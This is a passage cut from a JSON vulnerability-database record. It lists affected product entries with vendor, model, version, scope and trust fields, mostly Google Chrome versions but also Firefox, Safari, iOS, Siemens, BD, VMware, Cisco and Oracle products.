        "version": "4.1.249.1022"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "9.0.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.651.0"
      },
      {
        "_id": null,
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "3.1.1"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "1.5.0.11"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.6.27"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.31"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.0.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.109"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.476.0"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "10.0"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.38"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.61"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.124"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.44"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "3.0.195.37"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1055.2"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1670.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.354.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.38"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.222.12"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.33"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.690.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.75"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.42"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.73"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.64"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.570.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.22"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.347.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.13"
      },
      {
        "_id": null,
        "model": "vsphere integrated containers",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "1.2"
      },
      {
        "_id": null,
        "model": "sinumerik d sl ncu730.3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "840"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "3.0.195.24"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.47"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.90"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "35.0.1916.98"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.44"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.10"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.11"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.344"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "38"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.412.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.44"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "31.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.27"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.634.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.329.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.1"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.72"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1085.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.664.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1700.26"
      },
      {
        "_id": null,
        "model": "sinumerik d sl ncu730.3b",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "840"
      },
      {
        "_id": null,
        "model": "lsr ii",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.83"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.596.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.32"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.46"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.103"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.113"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.53"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.47"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.69"
      },
      {
        "_id": null,
        "model": "unified computing system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "3.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.730.0"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "1.0.3"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1060.0"
      },
      {
        "_id": null,
        "model": "pyxis supply roller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.40"
      },
      {
        "_id": null,
        "model": "facscount",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.610.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.422.0"
      },
      {
        "_id": null,
        "model": "windows server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "20160"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.48"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "2.0.0.11"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.43"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.24"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.874.116"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.299.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.3"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.31"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1036.3"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.41"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.19"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.371.0"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.6.4"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1700.56"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.48"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1668.6"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.107"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.615.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.599.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.41"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.99"
      },
      {
        "_id": null,
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "3.52"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.51"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.452.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.102"
      },
      {
        "_id": null,
        "model": "enterprise mrg",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "2"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "1.0.6"
      },
      {
        "_id": null,
        "model": "focal point linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "-0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.12"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "35.0.1916.92"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.6"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.24"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1675.2"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.30"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.50"
      },
      {
        "_id": null,
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "4.2.1"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.8"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "2.0.172.28"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.5.16"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.873.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.301.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.116"
      },
      {
        "_id": null,
        "model": "vrealize automation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "6.2.5"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.366.4"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.794.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.517.42"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.53"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.40"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.35"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.781.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "53.0.2785.143"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.60"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.34"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1298.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "2.0.157.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.134"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.18"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.7"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.72"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.34"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.554.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.45"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "40.0.3"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.71"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.13"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.36"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.775.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.7"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.59"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.631.0"
      },
      {
        "_id": null,
        "model": "communications lsms",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "13.2"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.125"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.114"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.102"
      },
      {
        "_id": null,
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "4.30"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.54"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.477.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.941.0"
      },
      {
        "_id": null,
        "model": "pyxis cathrack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "v80"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.335.3"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.65"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.35"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.516.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.430.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1684.2"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.11"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.37"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.457.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1289.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.48"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1008.0"
      },
      {
        "_id": null,
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "7.1.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.943.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "35.0.1916.6"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.21"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.6.3"
      },
      {
        "_id": null,
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "4"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.609.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.114"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364160"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.211.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.42"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.342.4"
      },
      {
        "_id": null,
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "4.2.5"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.582.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.63"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.589.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.41"
      },
      {
        "_id": null,
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "6.2.2"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.43"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.4"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.90"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.575.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1671.8"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1663.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.26"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.356.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "29.0.1547.33"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1280.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.84"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.21"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.57"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.30"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.122"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.6.17"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.39"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.37"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.95"
      },
      {
        "_id": null,
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "4"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.6.10"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.57"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1700.74"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.726.0"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.73"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.5"
      },
      {
        "_id": null,
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "4.3"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "27"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.84"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.667.3"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.3"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1034.0"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.56"
      },
